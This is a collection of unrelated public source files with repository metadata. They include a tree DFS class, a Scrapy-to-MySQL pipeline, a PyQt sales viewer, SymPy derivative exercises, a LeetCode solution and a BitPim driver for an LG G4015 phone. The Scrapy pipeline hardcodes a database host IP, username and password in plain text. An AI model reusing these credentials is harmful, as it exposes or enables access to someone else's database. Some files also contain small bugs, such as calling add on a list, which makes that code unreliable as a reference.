d252ab667829fa432f68967b4afe938872b2fded
|
c9894b1ec8fa9627436231d511c2fa39090013ae
|
refs/heads/master
| 2023-08-28T04:00:52.315796
| 2021-10-23T08:55:48
| 2021-10-23T08:55:48
| 267,893,017
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 408
|
py
|
class Node:
def __init__(self, name):
self.name = name
self.children = []
def addChild(self, name):
self.children.add(Node(name))
## this array parameter will contain the nodes in the order in which dfs will traverse
def dfs(self, array):
array.append(self.name)
for child in self.children:
child.dfs(array)
return array
|
[
"2017.mahesh.keswani@ves.ac.in"
] |
2017.mahesh.keswani@ves.ac.in
|
a8031ded3535a8d986397f81e78b23a3edbd4090
|
05fa669ab75829b4ca5fdaccfdd04b7febd48d2a
|
/pipelines.py
|
08d9452f8e82bfd094d09caddd4f5da5d0646ad1
|
[] |
no_license
|
songqingbo/scrapy_wangyi
|
5429883f273ed67e3f21e12e8e1c3f50cbe9c7b1
|
2f584a41a9be8d224725697217b8c17461377650
|
refs/heads/master
| 2021-01-19T04:55:47.469907
| 2017-04-06T08:19:04
| 2017-04-06T08:19:04
| 87,403,893
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,566
|
py
|
# -*- coding: utf-8 -*-
import MySQLdb
import time
class WangyiPipeline(object):
def __init__(self):
print 'init'
self.host = '101.200.159.42'
self.user = 'java'
self.pw = 'inspero'
self.database = 'musicnew'
def open_spider(self, spider):
self.database = MySQLdb.connect(self.host, self.user, self.pw, self.database, charset='utf8')
self.cursor = self.database.cursor()
self.cursor.execute('select version()')
data = self.cursor.fetchone()
print int(time.time()), 'Database version : %s' % data
del data
def close_spider(self, spider):
pass
def process_item(self, item, spider):
try:
insert_timestamp = str(int(time.time()))
for key in item.keys():
if item[key] == None:
item[key] = ''
sql = 'INSERT INTO wangyi_music(insert_timestamp,collection_name,category,song_name,song_id,artists,album_name,album_id,album_type,collection_tags) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'
temp_tuple = (
insert_timestamp, item['collection_name'], item['category'], item['song_name'], item['song_id'],
item['artists'], item['album_name'], item['album_id'], item['album_type'], item['collection_tags'])
inserted_list = [temp_tuple]
self.cursor.executemany(sql, inserted_list)
self.database.commit()
except Exception, e:
self.database.rollback()
print e
return item
|
[
"1792997269@qq.com"
] |
1792997269@qq.com
|
7359839f86074836d7c6a25a6217217830c1ca5e
|
72f128e70882dc1b8aaee44e213dce3f7a6216c4
|
/BLL/athleteOrderedItems.py
|
ccc2d2c51bd5cf710c78063b56ecc26bd751475c
|
[] |
no_license
|
Tfrodrigo/VMES-Sales-Summary
|
6e3f6f96e214c06a7bec5429cc1d8e2084fdf11b
|
e096bbfe24ffc3dd521016e4f4c63cae63981b1b
|
refs/heads/master
| 2020-09-09T13:43:52.949369
| 2020-01-25T09:26:17
| 2020-01-25T09:26:17
| 221,461,767
| 0
| 0
| null | 2020-01-25T09:26:18
| 2019-11-13T13:08:27
|
Python
|
UTF-8
|
Python
| false
| false
| 2,604
|
py
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMessageBox, QTableWidget,QTableWidgetItem
import sys
from functools import partial
sys.path.insert(0, '../DAL')
from handler import DataHandler
dh = DataHandler('../VMES.db')
sys.path.insert(0, '../UI')
import athleteOrderedItems_ui
class Main(QtWidgets.QMainWindow, athleteOrderedItems_ui.Ui_athete_orderedItems):
def __init__(self):
super(Main, self).__init__()
self.setupUi(self)
self.del_btn.clicked.connect(self.deleteAll)
self.priceMap = {}
self.dateMap = {}
self.total = 0
self.food = ""
self.price = 0
self.date = ""
self.f = []
self.p = []
self.d = []
self.n = []
self.newD = []
self.results = dh.getAllAthleteOrders()
for x in self.results:
self.priceMap[x[0]] = x[1]
self.dateMap[x[0]] = x[3]
self.f.append(x[0])
self.p.append(x[1])
self.n.append(x[2])
self.total = self.total + x[1]
self.total_lbl.setText(str(self.total))
print(self.priceMap)
print(self.dateMap)
for y in self.f:
dT = self.dateMap[y]
dT = list(dT)
del dT[10:]
dT = ''.join(map(str,dT))
print(dT)
self.dateMap[y] = str(dT)
self.d.append(str(dT))
self.tableWidget.setRowCount(len(self.f))
self.tableWidget.setColumnCount(4)
m = 0
for a in self.d:
self.tableWidget.setItem(m,0, QTableWidgetItem(a))
m += 1
m = 0
for b in self.f:
self.tableWidget.setItem(m,1, QTableWidgetItem(b))
m += 1
print(self.p)
m = 0
for c in self.p:
print(c)
self.tableWidget.setItem(m,2, QTableWidgetItem(str(c)))
m += 1
m = 0
for d in self.n:
print(c)
self.tableWidget.setItem(m,3, QTableWidgetItem(str(d)))
m += 1
def deleteAll(self):
dh.deleteSoldItemsAthlete()
self.msg = QMessageBox()
self.msg.setWindowTitle("SUCCESS")
self.msg.setText("Items Successfully Cleared")
x = self.msg.exec()
self.close()
self.win2 = Main()
self.win2.show()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
form = Main()
form.show()
sys.exit(app.exec_())
|
[
"noreply@github.com"
] |
Tfrodrigo.noreply@github.com
|
fe2cdcd32f98b4183ed69b57275abb3b9f6fda68
|
92bbffaf4645d4f31bb875f364613d33e4b16dee
|
/comtek/wsgi.py
|
07640011ebb9a37f61e8d74081b91109451da0b9
|
[] |
no_license
|
Alwa0/comtek_test
|
5ab57d345f14eafa1d8989d3ffb9e29c4fe950b2
|
2684afb887839a98372a13bd1b36da1f659d7e73
|
refs/heads/master
| 2023-06-17T00:16:14.936805
| 2021-07-05T13:43:01
| 2021-07-05T13:43:01
| 381,620,578
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 389
|
py
|
"""
WSGI config for comtek project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'comtek.settings')
application = get_wsgi_application()
|
[
"a.paukova@innopolis.university"
] |
a.paukova@innopolis.university
|
d3accd1450790151f1cc4bae3aac2b7777deb88c
|
743b3aa5721a7c09cba1810de6037fbf79de5603
|
/Neural_network/f_derivatives.py
|
0f5f6e8ac3518feaf17afa54477c5c4d7fbafd21
|
[] |
no_license
|
nz0001na/handson-ml
|
f3a1186ad357a5e1b025d644af9f1e78a27d4496
|
b0f0b65e765212669c4624a4caa2ba710607ab20
|
refs/heads/master
| 2023-08-08T02:13:34.212337
| 2023-08-05T03:54:23
| 2023-08-05T03:54:23
| 249,257,389
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,741
|
py
|
'''
This lab will give you a more intuitive understanding of derivatives.
It will show you a simple way of calculating derivatives arithmetically.
It will also introduce you to a handy Python library that allows you to calculate derivatives symbolically.
'''
from sympy import symbols, diff
J = (3)**2
J_epsilon = (3+0.001)**2
k = (J_epsilon - J) / 0.001 # difference divided by epsilon
print(f"J = {J}, J_epsilon = {J_epsilon}, dJ_dw ~= k = {k:0.6f} ")
J = (3)**2
J_epsilon = (3 + 0.000000001)**2
k = (J_epsilon - J)/0.000000001
print(f"J = {J}, J_epsilon = {J_epsilon}, dJ_dw ~= k = {k} ")
# Define the python variables and their symbolic names.
J, w = symbols('J, w')
# Define and print the expression.
J=w**2
print(J)
# Use SymPy's diff to differentiate the expression
# for ๐ฝ with respect to ๐ค. Note the result matches our earlier example.
dJ_dw = diff(J,w)
print(dJ_dw)
# Evaluate the derivative at a few points by
# 'substituting' numeric values for the symbolic values.
# In the first example, ๐ค is replaced by 2.
dJ_dw.subs([(w,2)])
dJ_dw.subs([(w,3)])
dJ_dw.subs([(w,-3)])
w, J = symbols('w, J')
J = 2 * w
dJ_dw = diff(J,w)
dJ_dw.subs([(w,-3)])
# Compare this with the arithmetic calculation
J = 2*3
J_epsilon = 2*(3 + 0.001)
k = (J_epsilon - J)/0.001
print(f"J = {J}, J_epsilon = {J_epsilon}, dJ_dw ~= k = {k} ")
J, w = symbols('J, w')
J=w**3
dJ_dw = diff(J,w)
dJ_dw.subs([(w,2)])
J = (2)**3
J_epsilon = (2+0.001)**3
k = (J_epsilon - J)/0.001
print(f"J = {J}, J_epsilon = {J_epsilon}, dJ_dw ~= k = {k} ")
J, w = symbols('J, w')
J= 1/w
dJ_dw = diff(J,w)
dJ_dw.subs([(w,2)])
J = 1/2
J_epsilon = 1/(2+0.001)
k = (J_epsilon - J)/0.001
print(f"J = {J}, J_epsilon = {J_epsilon}, dJ_dw ~= k = {k} ")
|
[
"noreply@github.com"
] |
nz0001na.noreply@github.com
|
4fb41b19a08644ca54882e05c48b17021c24fa0b
|
bc2a85e8dd9244f89e2f1801cc19d570a87c74ed
|
/Leetcode/Algorithms/Easy/DFS/PathsToLeaves.py
|
336c2921cae9752f9332113f74e3e72f985fc54c
|
[] |
no_license
|
christian-miljkovic/interview
|
1cab113dbe0096e860a3ae1d402901a15e808e32
|
63baa1535b788bc3e924f3c24a799bade6a2eae3
|
refs/heads/master
| 2023-01-11T14:53:09.304307
| 2020-02-04T17:35:12
| 2020-02-04T17:35:12
| 193,549,798
| 0
| 0
| null | 2023-01-05T05:56:15
| 2019-06-24T17:28:50
|
Python
|
UTF-8
|
Python
| false
| false
| 1,228
|
py
|
"""
Given a binary tree, return all root-to-leaf paths.
Note: A leaf is a node with no children.
Example:
Input:
1
/ \
2 3
\
5
Output: ["1->2->5", "1->3"]
Explanation: All root-to-leaf paths are: 1->2->5, 1->3
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def binaryTreePaths(self, root: TreeNode) -> List[str]:
if not root:
return []
paths = []
curr_path = str(root.val)
pre_order_dfs(root.left, curr_path, paths)
pre_order_dfs(root.right, curr_path, paths)
if not paths:
return curr_path
return paths
def pre_order_dfs(root, curr_path, paths):
if root:
new_path = curr_path + "->" + str(root.val)
if not root.left and not root.right:
paths.append(new_path)
return paths
pre_order_dfs(root.left, new_path, paths)
pre_order_dfs(root.right, new_path, paths)
return paths
|
[
"cmm892@stern.nyu.edu"
] |
cmm892@stern.nyu.edu
|
4e9ab2bd4be3a4849519d5303ae16a5aed55bf46
|
24d8cf871b092b2d60fc85d5320e1bc761a7cbe2
|
/BitPim/rev2895-2991/base-trunk-2895/phones/com_lgg4015.py
|
fd8246f01ff6a959d30da98cf06c5e09949710a7
|
[] |
no_license
|
joliebig/featurehouse_fstmerge_examples
|
af1b963537839d13e834f829cf51f8ad5e6ffe76
|
1a99c1788f0eb9f1e5d8c2ced3892d00cd9449ad
|
refs/heads/master
| 2016-09-05T10:24:50.974902
| 2013-03-28T16:28:47
| 2013-03-28T16:28:47
| 9,080,611
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 29,030
|
py
|
"""Communicate with the LG G4015 cell phone
"""
import base64
import sha
import time
import bpcalendar
import common
import commport
import com_gsm
import guihelper
import memo
import nameparser
import p_lgg4015
import prototypes
import sms
class Phone(com_gsm.Phone):
""" Talk to the LG G4015 Phone"""
desc='LG-G4015'
protocolclass=p_lgg4015
serialsname='lgg4015'
def __init__(self, logtarget, commport):
com_gsm.Phone.__init__(self, logtarget, commport)
self.mode=self.MODENONE
def getfundamentals(self, results):
"""Gets information fundamental to interoperating with the phone and UI.
Currently this is:
- 'uniqueserial' a unique serial number representing the phone
- 'groups' the phonebook groups
- 'wallpaper-index' map index numbers to names
- 'ringtone-index' map index numbers to ringtone names
This method is called before we read the phonebook data or before we
write phonebook data.
"""
self.setmode(self.MODEMODEM)
self.log("Retrieving fundamental phone information")
self.log("Reading phone serial number")
results['uniqueserial']=sha.new(self.get_sim_id()).hexdigest()
self.log("Reading group information")
results['groups']=self._get_groups()
self.log('Reading Ringtone Index')
results['ringtone-index']=self._get_ringtone_index()
self.log('Reading Wallpaper Index')
results['wallpaper-index']=self._get_wallpaper_index()
self.log("Fundamentals retrieved")
return results
def _get_groups(self):
res={}
self.charset_ascii()
_req=self.protocolclass.list_group_req()
for i in self.protocolclass.GROUP_INDEX_RANGE:
_req.start_index=i
_req.end_index=i
try:
_res=self.sendATcommand(_req, self.protocolclass.list_group_resp)
if _res and _res[0].group_name:
res[i]={ 'name': _res[0].group_name }
except:
if __debug__:
raise
return res
def _ringtone_mode(self):
_req=self.protocolclass.media_selector_set()
_req.media_type=self.protocolclass.MEDIA_RINGTONE
self.sendATcommand(_req, None)
def _get_ringtone_index(self):
""" Return the ringtone index"""
res={}
self.charset_ascii()
self._ringtone_mode()
_req=self.protocolclass.media_list_req()
_req.start_index=self.protocolclass.MIN_RINGTONE_INDEX
_req.end_index=self.protocolclass.MAX_RINGTONE_INDEX
_res=self.sendATcommand(_req, self.protocolclass.media_list_resp)
for i,e in enumerate(_res):
res[i]={ 'name': e.file_name, 'origin': 'ringtone' }
return res
def _wallpaper_mode(self):
_req=self.protocolclass.media_selector_set()
_req.media_type=self.protocolclass.MEDIA_WALLPAPER
self.sendATcommand(_req, None)
def _get_wallpaper_index(self):
""" Return the wallpaper index"""
res={}
self.charset_ascii()
self._wallpaper_mode()
_req=self.protocolclass.media_list_req()
_req.start_index=self.protocolclass.MIN_WALLPAPER_INDEX
_req.end_index=self.protocolclass.MAX_WALLPAPER_INDEX
_res=self.sendATcommand(_req, self.protocolclass.media_list_resp)
for i,e in enumerate(_res):
res[i]={ 'name': e.file_name, 'origin': 'wallpaper' }
return res
cal_repeat_value={
protocolclass.CAL_REP_DAILY: bpcalendar.RepeatEntry.daily,
protocolclass.CAL_REP_WEEKLY: bpcalendar.RepeatEntry.weekly,
protocolclass.CAL_REP_MONTHLY: bpcalendar.RepeatEntry.monthly,
protocolclass.CAL_REP_YEARLY: bpcalendar.RepeatEntry.yearly }
cal_repeat_value_r={
bpcalendar.RepeatEntry.daily: protocolclass.CAL_REP_DAILY,
bpcalendar.RepeatEntry.weekly: protocolclass.CAL_REP_WEEKLY,
bpcalendar.RepeatEntry.monthly: protocolclass.CAL_REP_MONTHLY,
bpcalendar.RepeatEntry.yearly: protocolclass.CAL_REP_YEARLY }
def _build_bpcalendar_entry(self, phone_entry):
entry=bpcalendar.CalendarEntry()
entry.start=phone_entry.date+phone_entry.time
entry.end=phone_entry.date+phone_entry.time
entry.description=phone_entry.description
entry.serials.append({ 'sourcetype': 'phone',
'id': phone_entry.index })
entry.alarm=self.protocolclass.CAL_ALARM_VALUE.get(phone_entry.alarm, -1)
_rpt_type=self.cal_repeat_value.get(phone_entry.repeat, None)
if _rpt_type:
rpt=bpcalendar.RepeatEntry(_rpt_type)
if _rpt_type!=bpcalendar.RepeatEntry.yearly:
rpt.interval=1
entry.end=bpcalendar.CalendarEntry.no_end_date
entry.repeat=rpt
return entry
def getcalendar(self, result):
self.log("Getting calendar entries")
self.setmode(self.MODEMODEM)
self.charset_ascii()
res={}
_req=self.protocolclass.calendar_read_req()
_req.start_index=self.protocolclass.CAL_MIN_INDEX
_req.end_index=self.protocolclass.CAL_MAX_INDEX
_res=self.sendATcommand(_req, self.protocolclass.calendar_read_resp)
for e in _res:
try:
_entry=self._build_bpcalendar_entry(e)
res[_entry.id]=_entry
except:
if __debug__:
raise
result['calendar']=res
return result
def _build_phone_cal_entry(self, entry_count, bpentry):
entry=self.protocolclass.calendar_write_req()
entry.index=entry_count
entry.date=bpentry.start[:3]
if bpentry.allday:
entry.time=(0,0)
else:
entry.time=bpentry.start[3:]
entry.description=bpentry.description
_alarm=self.protocolclass.CAL_ALARM_NONE
for e in self.protocolclass.CAL_ALARM_LIST:
if bpentry.alarm>=e[0]:
_alarm=e[1]
break
entry.alarm=_alarm
if bpentry.repeat:
_rpt_type=self.cal_repeat_value_r.get(bpentry.repeat.repeat_type,
self.protocolclass.CAL_REP_NONE)
else:
_rpt_type=self.protocolclass.CAL_REP_NONE
entry.repeat=_rpt_type
return entry
def savecalendar(self, dict, merge):
self.log('Saving calendar entries')
self.setmode(self.MODEMODEM)
self.charset_ascii()
_cal_dict=dict['calendar']
_cal_list=[(x.start, k) for k,x in _cal_dict.items()]
_cal_list.sort()
_cal_list=_cal_list[:self.protocolclass.CAL_TOTAL_ENTRIES]
_pre_write=self.protocolclass.calendar_write_check_req()
for i,e in enumerate(_cal_list):
_entry=self._build_phone_cal_entry(i, _cal_dict[e[1]])
self.progress(i, self.protocolclass.CAL_TOTAL_ENTRIES,
'Writing entry %d: %s'%(i, _entry.description))
try:
try:
self.sendATcommand(_entry, None)
_success=True
except:
_success=False
if not _success:
try:
self.sendATcommand(_pre_write, None)
except:
pass
self.sendATcommand(_entry, None)
except:
if __debug__:
raise
_req=self.protocolclass.calendar_del_req()
for i in range(len(_cal_list), self.protocolclass.CAL_TOTAL_ENTRIES):
self.progress(i, self.protocolclass.CAL_TOTAL_ENTRIES,
'Deleting entry %d'%i)
_req.index=i
try:
self.sendATcommand(_req, None)
except:
break
return dict
def charset_ascii(self):
""" Set the phone charset to some form of ascii"""
_req=self.protocolclass.charset_set_req()
_req.charset=self.protocolclass.CHARSET_IRA
self.sendATcommand(_req, None)
def charset_base64(self):
""" Set the phone charset to Base64 (for binary transmission)"""
_req=self.protocolclass.charset_set_req()
_req.charset=self.protocolclass.CHARSET_BASE64
self.sendATcommand(_req, None)
def is_mode_modem(self):
try:
self.comm.sendatcommand("Z")
self.comm.sendatcommand('E0V1')
return True
except:
return False
def get_detect_data(self, r):
r['manufacturer']=self.get_manufacturer_id()
r['model']=self.get_model_id()
r['firmware_version']=self.get_firmware_version()
r['esn']=self.get_sim_id()
def _detectphone(coms, likely_ports, res, _module, _log):
if not len(likely_ports):
return None
for port in likely_ports:
if not res.has_key(port):
res[port]={ 'mode_modem': None, 'mode_brew': None,
'manufacturer': None, 'model': None,
'firmware_version': None, 'esn': None,
'firmwareresponse': None }
try:
if res[port]['mode_modem']==False or \
res[port]['model']:
continue
p=Phone(_log, commport.CommConnection(_log, port, timeout=1))
if p.is_mode_modem():
res[port]['mode_modem']=True
p.get_detect_data(res[port])
else:
res[port]['mode_modem']=False
except:
if __debug__:
raise
detectphone=staticmethod(_detectphone)
def _build_bp_entry(self, entry, groups, in_sim=False):
res={ 'names': [ { 'full': entry.name } ] }
_numbers=[]
if entry.mobile:
_numbers.append({ 'number': entry.mobile,
'type': 'cell' })
if entry.home:
_numbers.append({ 'number': entry.home,
'type': 'home' })
if entry.office:
_numbers.append({ 'number': entry.office,
'type': 'office'})
if _numbers:
res['numbers']=_numbers
if entry.email:
res['emails']=[{ 'email': entry.email }]
if entry.memo:
res['memos']=[{ 'memo': entry.memo }]
_group=groups.get(entry.group, None)
if _group and _group.get('name', None):
res['categories']=[{ 'category': _group['name'] }]
if entry.sim:
res['flags']=[{ 'sim': in_sim }]
return res
def _get_main_phonebook(self, groups):
"""return a dict of contacts read off the phone storage area"""
_req=self.protocolclass.select_storage_req()
_req.storage=self.protocolclass.PB_MEMORY_MAIN
self.sendATcommand(_req, None)
_req=self.protocolclass.read_phonebook_req()
_req.start_index=self.protocolclass.PB_MAIN_MIN_INDEX
_req.end_index=self.protocolclass.PB_MAIN_MAX_INDEX
_res=self.sendATcommand(_req, self.protocolclass.read_phonebook_resp)
res={}
for e in _res:
res[e.index]=self._build_bp_entry(e, groups)
return res
def _get_sim_phonebook(self, groups):
"""return a dict of contacts read off the phone SIM card"""
_req=self.protocolclass.select_storage_req()
_req.storage=self.protocolclass.PB_MEMORY_SIM
self.sendATcommand(_req, None)
_req=self.protocolclass.read_phonebook_req()
_req.start_index=self.protocolclass.PB_SIM_MIN_INDEX
_req.end_index=self.protocolclass.PB_SIM_MAX_INDEX
_res=self.sendATcommand(_req, self.protocolclass.read_sim_phonebook_resp)
res={}
for e in _res:
res[1000+e.index]=self._build_bp_entry(e, groups, in_sim=True)
return res
def getphonebook(self,result):
"""Reads the phonebook data. The L{getfundamentals} information will
already be in result."""
self.log('Getting phonebook')
self.setmode(self.MODEMODEM)
self.charset_ascii()
_groups=result.get('groups', {})
pb_book=self._get_main_phonebook(_groups)
pb_book.update(self._get_sim_phonebook(_groups))
result['phonebook']=pb_book
return pb_book
def _in_sim(self, entry):
""" Return True if this entry has the sim flag set, indicating that
it should be stored on the SIM card.
"""
for l in entry.get('flags', []):
if l.has_key('sim'):
return l['sim']
return False
def _lookup_group(self, entry, groups):
try:
_name=entry['categories'][0]['category']
except:
return 0
for k,e in groups.items():
if e['name']==_name:
return k
return 0
def _build_main_entry(self, entry, groups):
_req=self.protocolclass.write_phonebook_req()
_req.group=self._lookup_group(entry, groups)
_req.name=nameparser.getfullname(entry['names'][0])
_req.email=entry.get('emails', [{'email': ''}])[0]['email']
_req.memo=entry.get('memos', [{'memo': ''}])[0]['memo']
for n in entry.get('numbers', []):
_type=n['type']
_number=n['number']
if _type=='cell':
_req.mobile=_number
_req.mobile_type=129
elif _type=='home':
_req.home=_number
_req.home_type=129
elif _type=='office':
_req.office=_number
_req.office_type=129
return _req
def _build_sim_entry(self, entry, groups):
_req=self.protocolclass.write_sim_phonebook_req()
_req.group=self._lookup_group(entry, groups)
_req.name=nameparser.getfullname(entry['names'][0])
_number=entry.get('numbers', [{'number': ''}])[0]['number']
if _number:
_req.number=_number
_req.number_type=129
return _req
def _save_main_phonebook(self, entries, groups):
""" got the the phonebook dict and write them out to the phone"""
_pb_list=[(nameparser.getfullname(e['names'][0]), k) \
for k,e in entries.items() if not self._in_sim(e)]
_pb_list.sort()
_req=self.protocolclass.select_storage_req()
_req.storage=self.protocolclass.PB_MEMORY_MAIN
self.sendATcommand(_req, None)
_del_entry=self.protocolclass.del_phonebook_req()
_index=self.protocolclass.PB_MAIN_MIN_INDEX
for l in _pb_list:
_del_entry.index=_index
_index+=1
self.sendATcommand(_del_entry, None)
time.sleep(0.2)
_req=self._build_main_entry(entries[l[1]], groups)
self.progress(_index, self.protocolclass.PB_MAIN_MAX_INDEX,
'Writing entry %d: %s'%(_index, _req.name))
try:
self.sendATcommand(_req, None)
_retry=False
except:
_retry=True
if _retry:
try:
self.sendATcommand(_req, None)
except:
self.log('Failed to write entry %d: %s'%(_index, _req.name))
time.sleep(0.2)
for i in range(_index, self.protocolclass.PB_MAIN_MAX_INDEX+1):
self.progress(i, self.protocolclass.PB_MAIN_MAX_INDEX,
'Deleting entry %d'%i)
try:
_del_entry.index=i
self.sendATcommand(_del_entry, None)
continue
except:
self.log('Trying to delete entry %d'%i)
try:
self.sendATcommand(_del_entry, None)
except:
self.log('Failed to delete entry %d'%i)
def _save_sim_phonebook(self, entries, groups):
""" got the the phonebook dict and write them out to the phone"""
_pb_list=[(nameparser.getfullname(e['names'][0]), k) \
for k,e in entries.items() if self._in_sim(e)]
_pb_list.sort()
_req=self.protocolclass.select_storage_req()
_req.storage=self.protocolclass.PB_MEMORY_SIM
self.sendATcommand(_req, None)
_del_entry=self.protocolclass.del_phonebook_req()
_index=self.protocolclass.PB_SIM_MIN_INDEX
for l in _pb_list:
_del_entry.index=_index
_index+=1
self.sendATcommand(_del_entry, None)
time.sleep(0.2)
_req=self._build_sim_entry(entries[l[1]], groups)
self.progress(_index, self.protocolclass.PB_SIM_MAX_INDEX,
'Writing SIM entry %d: %s'%(_index, _req.name))
try:
self.sendATcommand(_req, None)
_retry=False
except:
_retry=True
if _retry:
try:
self.sendATcommand(_req, None)
except:
self.log('Failed to write SIM entry %d: %s'%(_index, _req.name))
time.sleep(0.2)
for i in range(_index, self.protocolclass.PB_SIM_MAX_INDEX+1):
self.progress(i, self.protocolclass.PB_SIM_MAX_INDEX,
'Deleting SIM entry %d'%i)
try:
_del_entry.index=i
self.sendATcommand(_del_entry, None)
continue
except:
self.log('Trying to delete entry %d'%i)
try:
self.sendATcommand(_del_entry, None)
except:
self.log('Failed to delete entry %d'%i)
def savephonebook(self, data):
"Saves out the phonebook"
self.log('Writing phonebook')
self.setmode(self.MODEMODEM)
self.charset_ascii()
pb_book=data.get('phonebook', {})
pb_groups=data.get('groups', {})
self._save_main_phonebook(pb_book, pb_groups)
self._save_sim_phonebook(pb_book, pb_groups)
return data
def _del_media_files(self, names):
self.charset_ascii()
_req=self.protocolclass.del_media_req()
for n in names:
self.log('Deleting media %s'%n)
_req.file_name=n
try:
self.sendATcommand(_req, None)
except:
self.log('Failed to delete media %s'%n)
def _add_media_file(self, file_name, media_name, media_code, data):
""" Add one media ringtone
"""
if not file_name or not media_name or not data:
return False
self.log('Writing media %s'%file_name)
_media_name=''
for s in media_name:
_media_name+=s+'\x00'
_cmd='AT+DDLW=0,"%s","%s",%d,%d,0,0,0,0\r' % \
(file_name, base64.encodestring(_media_name), len(data),
media_code)
_data64=base64.encodestring(data)
self.comm.write(str(_cmd))
if self.comm.read(4)!='\r\n> ':
return False
for l in _data64.split('\n'):
if l:
self.comm.write(l+'\n')
time.sleep(0.01)
self.comm.write(str('\x1A'))
return self.comm.read(6)=='\r\nOK\r\n'
def _add_ringtones(self, names, name_dict, media):
self.charset_base64()
for n in names:
_media_key=name_dict[n]
if not self._add_media_file(n, common.stripext(n), 20,
media[_media_key].get('data', '')):
self.log('Failed to send ringtone %s'%n)
self.charset_ascii()
def saveringtones(self, result, merge):
self.log('Saving ringtones')
self.setmode(self.MODEMODEM)
self.charset_ascii()
self._ringtone_mode()
media=result.get('ringtone', {})
media_index=result.get('ringtone-index', {})
media_names=[x['name'] for x in media.values()]
index_names=[x['name'] for x in media_index.values()]
del_names=[x for x in index_names if x not in media_names]
new_names=[x for x in media_names if x not in index_names]
self._del_media_files(del_names)
names_to_keys={}
for k,e in media.items():
names_to_keys[e['name']]=k
self._add_ringtones(new_names, names_to_keys, media)
return result
def getringtones(self, result):
self.log('Reading ringtones index')
self.setmode(self.MODEMODEM)
self.charset_ascii()
self._ringtone_mode()
media={}
media_index=self._get_ringtone_index()
for e in media_index.values():
media[e['name']]='dummy data'
result['ringtone']=media
result['ringtone-index']=media_index
return result
def getwallpapers(self, result):
self.log('Reading wallpaper index')
self.setmode(self.MODEMODEM)
self.charset_ascii()
self._wallpaper_mode()
media={}
media_index=self._get_wallpaper_index()
_dummy_data=file(guihelper.getresourcefile('wallpaper.png'),'rb').read()
for e in media_index.values():
media[e['name']]=_dummy_data
result['wallpapers']=media
result['wallpaper-index']=media_index
return result
def _add_wallpapers(self, names, name_dict, media):
self.charset_base64()
for n in names:
_media_key=name_dict[n]
if not self._add_media_file(n, common.stripext(n), 12,
media[_media_key].get('data', '')):
self.log('Failed to send wallpaper %s'%n)
self.charset_ascii()
def savewallpapers(self, result, merge):
self.log('Saving wallpapers')
self.setmode(self.MODEMODEM)
self.charset_ascii()
self._wallpaper_mode()
media=result.get('wallpapers', {})
media_index=result.get('wallpaper-index', {})
media_names=[x['name'] for x in media.values()]
index_names=[x['name'] for x in media_index.values()]
del_names=[x for x in index_names if x not in media_names]
new_names=[x for x in media_names if x not in index_names]
self._del_media_files(del_names)
names_to_keys={}
for k,e in media.items():
names_to_keys[e['name']]=k
self._add_wallpapers(new_names, names_to_keys, media)
return result
def getmemo(self, result):
self.log('Reading Memo')
self.setmode(self.MODEMODEM)
self.charset_ascii()
_req=self.protocolclass.memo_read_req()
_res=self.sendATcommand(_req, self.protocolclass.memo_read_resp)
res={}
for e in _res:
_memo=memo.MemoEntry()
_memo.text=e.text
res[_memo.id]=_memo
result['memo']=res
return res
def savememo(self, result, merge):
self.log('Writing Memo')
self.setmode(self.MODEMODEM)
self.charset_ascii()
_req=self.protocolclass.memo_del_req()
for i in range(self.protocolclass.MEMO_MIN_INDEX,
self.protocolclass.MEMO_MAX_INDEX+1):
_req.index=i
try:
self.sendATcommand(_req, None)
except:
pass
_memo_dict=result.get('memo', {})
_keys=_memo_dict.keys()
_keys.sort()
_req=self.protocolclass.memo_write_req()
for k in _keys:
_req.text=_memo_dict[k].text
try:
self.sendATcommand(_req, None)
except:
self.log('Failed to write memo %s'%_req.text)
return _memo_dict
def _process_sms(self, _resp, res):
for i in range(0, len(_resp), 2):
try:
_entry=self.protocolclass.sms_msg_list_header()
_buf=prototypes.buffer(_resp[i])
_entry.readfrombuffer(_buf)
_sms=sms.SMSEntry()
if _entry.msg_type==self.protocolclass.SMS_MSG_REC_UNREAD or \
_entry.msg_type==self.protocolclass.SMS_MSG_REC_READ:
_sms._from=_entry.address
_sms.folder=sms.SMSEntry.Folder_Inbox
_sms.read=_entry.msg_type==self.protocolclass.SMS_MSG_REC_READ
elif _entry.msg_type==self.protocolclass.SMS_MSG_STO_SENT:
_sms.add_recipient(_entry.address)
_sms.folder=sms.SMSEntry.Folder_Sent
elif _entry.msg_type==self.protocolclass.SMS_MSG_STO_UNSENT:
_sms.folder=sms.SMSEntry.Folder_Saved
_sms.add_recipient(_entry.address)
else:
self.log('Unknown message type: %s'%_entry.msg_type)
_sms=None
if _sms:
if _entry.timestamp:
_sms.datetime=_entry.timestamp
_sms.text=_resp[i+1]
res[_sms.id]=_sms
except:
if __debug__:
raise
return res
def getsms(self, result):
self.log('Getting SMS Messages')
self.setmode(self.MODEMODEM)
self.charset_ascii()
res={}
_req=self.protocolclass.sms_format_req()
self.sendATcommand(_req, None)
self.log('Getting SMS messages from the phone memory')
_sms_mem=self.protocolclass.sms_memory_select_req()
_sms_mem.list_memory=self.protocolclass.SMS_MEMORY_PHONE
self.sendATcommand(_sms_mem, None)
_list_sms=self.protocolclass.sms_msg_list_req()
_resp=self.sendATcommand(_list_sms, None)
self._process_sms(_resp, res)
self.log('Getting SMS message from the SIM card')
_sms_mem.list_memory=self.protocolclass.SMS_MEMORY_SIM
self.sendATcommand(_sms_mem, None)
_resp=self.sendATcommand(_list_sms, None)
self._process_sms(_resp, res)
try:
self.sendATcommand(_sms_mem, None)
except commport.ATError:
pass
result['sms']=res
return result
